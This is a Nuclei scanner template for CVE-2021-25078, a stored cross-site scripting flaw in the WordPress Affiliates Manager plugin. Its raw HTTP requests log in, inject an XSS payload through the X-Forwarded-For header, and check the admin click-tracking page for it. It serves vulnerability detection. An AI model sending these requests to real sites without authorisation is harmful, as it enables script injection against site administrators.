nuclei-templates/http/cves/2021/CVE-2021-25078.yaml

57 lines
2.3 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2021-25078
info:
name: Affiliates Manager < 2.9.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of an authenticated user, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation: Fixed in version 2.9.0
2023-04-21 08:56:01 +00:00
reference:
- https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e
- https://nvd.nist.gov/vuln/detail/CVE-2021-25078
2023-07-11 19:49:27 +00:00
- https://plugins.trac.wordpress.org/changeset/2648196
- https://github.com/ARPSyndicate/cvemon
2023-07-11 19:49:27 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25078
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.00382
2024-05-31 19:23:20 +00:00
epss-percentile: 0.72963
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:*
2023-04-21 08:56:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: wpaffiliatemanager
product: affiliates_manager
2023-09-06 12:09:01 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager
2023-04-21 08:56:01 +00:00
http:
2023-04-21 08:56:01 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /?wpam_id=1 HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: <img src onerror=alert(document.domain)>
- |
GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200 && status_code_3 == 200'
- 'contains(header_3, "text/html")'
2023-04-21 08:56:01 +00:00
- 'contains(body_3, "<img src onerror=alert(document.domain)>")'
- 'contains(body_3, "Affiliates Manager Click Tracking")'
condition: and
# digest: 490a0046304402205420c61f4ee475a86db3c599da678c923ba014fa64627236d5f17ffd13df56560220707745d963b3cbb472024e4a4378e9b1558221e88182717ff860524bf1d80101:922c64590222798bb761d5b6d8e72950